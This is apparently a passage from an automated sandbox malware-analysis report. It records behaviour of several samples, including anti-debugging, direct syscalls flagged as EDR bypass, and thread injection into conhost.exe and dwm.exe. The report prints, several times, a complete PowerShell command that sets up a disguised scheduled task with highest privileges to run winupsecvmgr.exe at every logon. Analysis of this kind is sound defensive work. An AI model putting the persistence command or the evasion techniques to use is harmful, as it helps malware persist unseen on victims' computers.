                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeCode function: 16_2_00AF1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,16_2_00AF1A20
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                  Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 900000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: sysnldcvmr.exe, 00000001.00000003.1757912131.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023976839.000000000109A000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023976839.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 204078699.exe, 0000000E.00000002.1994989301.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 204078699.exe, 0000000E.00000002.1994989301.0000000000CE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 204078699.exe, 0000000E.00000002.1994989301.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: C:\Users\user\Desktop\newtpp.exeAPI call chain: ExitProcess graph end nodegraph_0-4360
                  Source: C:\Users\user\Desktop\newtpp.exeAPI call chain: ExitProcess graph end nodegraph_0-4352
                  Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_1-4386
                  Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_1-4364
                  Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_1-4354
                  Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_2-4360
                  Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_2-4386
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeCode function: 11_2_00D91C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_00D91C08
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00409EE0 GetProcessHeaps,0_2_00409EE0
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeCode function: 11_2_00D91C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_00D91C08
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeCode function: 14_2_00571898 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,14_2_00571898
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeCode function: 16_2_00AF2798 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,16_2_00AF2798
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C51180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,24_2_00007FF693C51180
                  Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF693C66731 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,24_2_00007FF693C66731
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeNtQuerySystemInformation: Direct from: 0x7FF684C85B0EJump to behavior
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeNtQuerySystemInformation: Direct from: 0x7FF7A2DD5B0E
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\sysnldcvmr.exe protection: readonly
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 8116
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 3608
                  Writes to foreign memory regions
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\conhost.exe base: ADF3530010
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\dwm.exe base: ED43102010
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }Jump to behavior
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: GetLocaleInfoA,strcmp,0_2_0040E730
                  Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,1_2_0040E730
                  Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,2_2_0040E730
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1224321169.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
